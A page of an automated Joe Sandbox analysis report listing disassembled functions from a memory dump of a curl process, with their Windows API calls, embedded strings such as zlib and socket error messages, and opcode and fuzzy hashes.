Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminateabort
String ID: UG
API String ID: 520269711-3410356670
Opcode ID: b9961e14052ba69a6f5f0e04ae97eaac679e046c3a92ddbb40485c68e50e05df
Instruction ID: 95486ddb85c5e88e330c959c12da3e26616a4e91c4b7be2de3ec047405c96a9d
Opcode Fuzzy Hash: b9961e14052ba69a6f5f0e04ae97eaac679e046c3a92ddbb40485c68e50e05df
Instruction Fuzzy Hash: B8018CB4804705DFD740EFB9EA486497BF0BB04746F00892DE9488B366EBB595848F8A

Function 0044C7A0 Relevance: 7.6, APIs: 5, Instructions: 56timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 0044C7D8
GetCurrentProcessId.KERNEL32 ref: 0044C7E9
GetCurrentThreadId.KERNEL32 ref: 0044C7F1
GetTickCount.KERNEL32 ref: 0044C7FA
QueryPerformanceCounter.KERNEL32 ref: 0044C809

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: fbb319ed10cc4a18cc47b3961fbfe65609aca1df28822c28f5cccab5fafd20d8
Instruction ID: ce76450e65e40e36c84413c79639c4125472da8dd5f3eddbdcd0b6199cab7b43
Opcode Fuzzy Hash: fbb319ed10cc4a18cc47b3961fbfe65609aca1df28822c28f5cccab5fafd20d8
Instruction Fuzzy Hash: D1113776D002188FDB10AFB8E8481CEFBF0FB08666F45413AD909B7240DB35A9548B99

Function 0042BAC9 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42networkCOMMON

Download Yara Rule

APIs

WSAGetLastError.WS2_32 ref: 0042B940
getsockname.WS2_32 ref: 0042BAF7
listen.WS2_32 ref: 0042BB19
WSAGetLastError.WS2_32 ref: 0042BB28

Part of subcall function 00413810: GetLastError.KERNEL32 ref: 00413822
Part of subcall function 00413810: strrchr.MSVCRT ref: 00413941
Part of subcall function 00413810: strrchr.MSVCRT ref: 00413961
Part of subcall function 00413810: GetLastError.KERNEL32 ref: 00413975
Part of subcall function 00413810: SetLastError.KERNEL32 ref: 00413981
Part of subcall function 00413810: FormatMessageA.KERNEL32 ref: 00413B3C
Part of subcall function 00413810: curl_msnprintf.CURL ref: 00413B68

htons.WS2_32 ref: 0042BC49
curl_msnprintf.CURL ref: 0042BCAF

Strings

socket failure: %s, xrefs: 0042BB40

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: ErrorLast$curl_msnprintfstrrchr$FormatMessagegetsocknamehtonslisten
String ID: socket failure: %s
API String ID: 1772941274-3378487419
Opcode ID: 29daea0dda8ccfadc13c4e47b8082a2591c6929199a975816c581a98079109f6
Instruction ID: 955df97846d860e4cf2e6ff1f8666b576d1129ee348fe4f53912f396cdba34c1
Opcode Fuzzy Hash: 29daea0dda8ccfadc13c4e47b8082a2591c6929199a975816c581a98079109f6
Instruction Fuzzy Hash: 6D1196B5A063159FDB10AF64D94829EBBF0EF45714F0088AEE88897301E77499848F86

Function 00450690 Relevance: 6.6, APIs: 4, Instructions: 642COMMON

Download Yara Rule

APIs

localeconv.MSVCRT ref: 00450697

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: localeconv
String ID:
API String ID: 3737801528-0
Opcode ID: c5fca5c7840362e3a30c3d539f0b135e5e37ec8f971a9322b650b3d16640773b
Instruction ID: 41f2da25613cf99f624f49dc88c581c4a5bf1735a1666e0d9c66384cb49d4cdc
Opcode Fuzzy Hash: c5fca5c7840362e3a30c3d539f0b135e5e37ec8f971a9322b650b3d16640773b
Instruction Fuzzy Hash: 48328079A083558BD710CF29C09036BBBE2BB85306F19495EEC859B342D379ED49CB86

Function 004467A0 Relevance: 6.0, APIs: 4, Instructions: 49encryptionCOMMON

Download Yara Rule

APIs

CryptGetHashParam.ADVAPI32 ref: 004467D7
CryptReleaseContext.ADVAPI32 ref: 004467FA
CryptGetHashParam.ADVAPI32 ref: 00446841

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: Crypt$HashParam$ContextRelease
String ID:
API String ID: 2902255516-0
Opcode ID: 2133bbdf15a8d3041b66971b1de383b02705702eee948c90c5c30baa9bc5b390
Instruction ID: d630c6e10f8353617a187863de70728e4bcf2be770eb8927a4c87b57f806059b
Opcode Fuzzy Hash: 2133bbdf15a8d3041b66971b1de383b02705702eee948c90c5c30baa9bc5b390
Instruction Fuzzy Hash: 0311C5B0908305DBEB00AF69D58965ABFF4EF41714F01882EE8988B245D779D849CF97

Function 00448DA4 Relevance: 5.4, Strings: 4, Instructions: 432COMMON

Download Yara Rule

Strings

invalid code -- missing end-of-block, xrefs: 00449B8C
invalid literal/lengths set, xrefs: 00449D50
invalid distances set, xrefs: 00449DEF
invalid bit length repeat, xrefs: 00449E1E, 00449E3F

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID:
String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid distances set$invalid literal/lengths set
API String ID: 0-1153561608
Opcode ID: a63d6ee6197b1b0f085525e9b8260c1990cd16acb7a5b83472e78539bc41ea41
Instruction ID: 163b69a2f9ece799876b9667b9b66e6dd45b9b4426274e7643681f47052b65ed
Opcode Fuzzy Hash: a63d6ee6197b1b0f085525e9b8260c1990cd16acb7a5b83472e78539bc41ea41
Instruction Fuzzy Hash: 49023271A083518FD7148F19C08025BFBE1BBC9714F298A5EE898A7344D378ED46DF8A

Function 00434060 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 113networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00433A10: time.MSVCRT ref: 00433A2A
Part of subcall function 00433A10: time.MSVCRT ref: 00433AEE

bind.WS2_32 ref: 00434127
WSAGetLastError.WS2_32 ref: 004341B0

Strings

bind() failed; %s, xrefs: 004341C2

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: time$ErrorLastbind
String ID: bind() failed; %s
API String ID: 2806610742-1141498939
Opcode ID: db78f4699bcf925b15616a39218ef59d876f458dee551e0bdd8452741c4c2c09
Instruction ID: c674793869b9a7eb892cf024dace8eecae8f006401954e4c4de0b875094eb24b
Opcode Fuzzy Hash: db78f4699bcf925b15616a39218ef59d876f458dee551e0bdd8452741c4c2c09
Instruction Fuzzy Hash: 144138756047009FDB60DF69D88879ABBF4FF88314F00886EE998CB341E338E8408B95

Function 0044B3FC Relevance: 4.4, Strings: 3, Instructions: 692COMMON

Download Yara Rule

Strings

invalid distance too far back, xrefs: 0044BD09
invalid literal/length code, xrefs: 0044B907
invalid distance code, xrefs: 0044B927

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID:
String ID: invalid distance code$invalid distance too far back$invalid literal/length code
API String ID: 0-3255898291
Opcode ID: 116e75538189c10218bea9301ef3c80f7811aadc1501c19cea1de3cf40e54532
Instruction ID: f0ef55d6c40aae1e267c56814c699f158b66b8897aa5cb2bdc359954e6b43b87
Opcode Fuzzy Hash: 116e75538189c10218bea9301ef3c80f7811aadc1501c19cea1de3cf40e54532
Instruction Fuzzy Hash: 896200769093918BD714CF28C18052AFBE2FFC8714F198A6EE8D967315C774E849CB86

Function 004468EC Relevance: 3.0, APIs: 2, Instructions: 30stringencryptionCOMMON

Download Yara Rule

APIs

Part of subcall function 00446880: CryptAcquireContextA.ADVAPI32 ref: 004468AD
Part of subcall function 00446880: CryptCreateHash.ADVAPI32 ref: 004468DE

strlen.MSVCRT ref: 00446909
CryptHashData.ADVAPI32 ref: 0044692C

Part of subcall function 004467A0: CryptGetHashParam.ADVAPI32 ref: 004467D7
Part of subcall function 004467A0: CryptReleaseContext.ADVAPI32 ref: 004467FA

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: Crypt$Hash$Context$AcquireCreateDataParamReleasestrlen
String ID:
API String ID: 820084474-0
Opcode ID: 8fd65feb70a6d03519727fdc64a1191b0f9e8e1bd814b904777348478f127d3e
Instruction ID: 39d91b2111da1336bee00ec6f2e71de7175b14e3940bab6df2fab0dc6a161ea2
Opcode Fuzzy Hash: 8fd65feb70a6d03519727fdc64a1191b0f9e8e1bd814b904777348478f127d3e
Instruction Fuzzy Hash: E3F01DB1804714AFDB00BFB9C88519EBFF4FF04354F01881EF99857201D734A5448B96

Function 004468F0 Relevance: 3.0, APIs: 2, Instructions: 29stringencryptionCOMMON

Download Yara Rule

APIs

Part of subcall function 00446880: CryptAcquireContextA.ADVAPI32 ref: 004468AD
Part of subcall function 00446880: CryptCreateHash.ADVAPI32 ref: 004468DE

strlen.MSVCRT ref: 00446909
CryptHashData.ADVAPI32 ref: 0044692C

Part of subcall function 004467A0: CryptGetHashParam.ADVAPI32 ref: 004467D7
Part of subcall function 004467A0: CryptReleaseContext.ADVAPI32 ref: 004467FA

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: Crypt$Hash$Context$AcquireCreateDataParamReleasestrlen
String ID:
API String ID: 820084474-0
Opcode ID: 9eb43227c5bad21b0df187468efcd48922b853bbad3616b66d7acbd93ed45467
Instruction ID: 1e0e11bab3a5bfa783f53ab431486b13269321141ae825300b2f97e4e898670c
Opcode Fuzzy Hash: 9eb43227c5bad21b0df187468efcd48922b853bbad3616b66d7acbd93ed45467
Instruction Fuzzy Hash: 72F0D0B08057149FDB00BF79D48559EBFF4FF05754F41881EF89857201D734A5448B96

Function 00446880 Relevance: 3.0, APIs: 2, Instructions: 26encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32 ref: 004468AD
CryptCreateHash.ADVAPI32 ref: 004468DE

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: Crypt$AcquireContextCreateHash
String ID:
API String ID: 1914063823-0
Opcode ID: c24458f65199ae5dca5d1acae3945c8819564a88df078f58b05cc8c93b5771a8
Instruction ID: 889dda2fa48d19ac03d1e511827170c3afaab73633315f79e18a421e0a410857
Opcode Fuzzy Hash: c24458f65199ae5dca5d1acae3945c8819564a88df078f58b05cc8c93b5771a8
Instruction Fuzzy Hash: 35F092B05083059FE700EF29C59870ABBE4BB44748F01886CE8998B245D7BAD588CF92

Function 0044680C Relevance: 3.0, APIs: 2, Instructions: 18encryptionCOMMON

Download Yara Rule

APIs

CryptReleaseContext.ADVAPI32 ref: 004467FA
CryptDestroyHash.ADVAPI32 ref: 00446813

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: Crypt$ContextDestroyHashRelease
String ID:
API String ID: 3989222877-0
Opcode ID: 0ee60de2fd54bc8671f36ccf1c62d1c2c901d0b7a37ae281101a589dfcab9e4f
Instruction ID: c76dde88df06ba62da5a3805f7289e075f1f15680550e2f2e46d3f937cec9e07
Opcode Fuzzy Hash: 0ee60de2fd54bc8671f36ccf1c62d1c2c901d0b7a37ae281101a589dfcab9e4f
Instruction Fuzzy Hash: 30E0EC769042008FEB006FBCE94C299BBF0FB41715F01483ED959D3100DB35D4598B97

Function 00446849 Relevance: 1.5, APIs: 1, Instructions: 16encryptionCOMMON

Download Yara Rule

APIs

CryptHashData.ADVAPI32 ref: 00446875

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: CryptDataHash
String ID:
API String ID: 4245837645-0
Opcode ID: 5a7a1667719dbb8b8b85408a663cc21f1da88a4b5bf6dc3635092ddb4c2feb8c
Instruction ID: 644f0b570d0f6bfc541b0c671519243c6dccd25f9b098f240486bdea5645582c
Opcode Fuzzy Hash: 5a7a1667719dbb8b8b85408a663cc21f1da88a4b5bf6dc3635092ddb4c2feb8c
Instruction Fuzzy Hash: A3E09978904304AFCB00EF6CC589A4ABBE4AB48204F40885CEC9897301E630E8408B82

Function 00446850 Relevance: 1.5, APIs: 1, Instructions: 15encryptionCOMMON

Download Yara Rule

APIs

CryptHashData.ADVAPI32 ref: 00446875

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: CryptDataHash
String ID:
API String ID: 4245837645-0
Opcode ID: 5fa2dde6a92b6aee0bd72dad6da19315c76f01eed0efdcbe2fd57e940a468885
Instruction ID: e92e64a128f4f8993da9dcfb0116579dd5dc24c1ee4dfa7ee7ad94c98d8b6e16
Opcode Fuzzy Hash: 5fa2dde6a92b6aee0bd72dad6da19315c76f01eed0efdcbe2fd57e940a468885
Instruction Fuzzy Hash: 68E04274504304AFD740EF6CC589A4ABBF4EB48654F40C95DFC98C7351E674E8548F92

Function 0041FCC6 Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

8, xrefs: 0042050F

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID:
String ID: 8
API String ID: 0-4194326291
Opcode ID: c691b6b38df63d398b6070efa6056f147c4bc42f1996cdb9f48f2ea92ef5090c
Instruction ID: fe0ccc08be04c941a24692768fea1ca6074f7bd408afd2ec37509552f13ab135
Opcode Fuzzy Hash: c691b6b38df63d398b6070efa6056f147c4bc42f1996cdb9f48f2ea92ef5090c
Instruction Fuzzy Hash: BAA1E8B0A083108FDB10DF25D08475ABBE1BF84318F55896EED988B356D779D885CF8A

Function 0044A59C Relevance: .2, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4efa9e26e535486a535e0a5242f974d6effca991898bb2b462dcd75fef2997a
Instruction ID: 58ce5ae41ef6931939ec08ac04333ff55e8336345482dec61b198a453a4ef875
Opcode Fuzzy Hash: d4efa9e26e535486a535e0a5242f974d6effca991898bb2b462dcd75fef2997a
Instruction Fuzzy Hash: 2771073256065A8FE360EF1DED44126B3A3EBCD320F4A0A34D74887363D638F5A29758

Function 0044D100 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abc97ff8b00330c42eaec1eab87a35c786fba96b82cc726048d531dba98f1ecc
